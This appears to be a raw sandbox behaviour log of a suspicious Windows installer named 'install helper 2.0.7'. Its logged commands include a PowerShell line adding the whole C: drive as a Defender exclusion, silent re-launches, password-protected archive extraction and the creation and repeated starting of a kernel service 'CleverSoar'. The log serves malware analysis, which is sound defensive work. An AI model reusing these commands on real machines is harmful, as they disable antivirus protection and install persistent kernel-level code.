Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
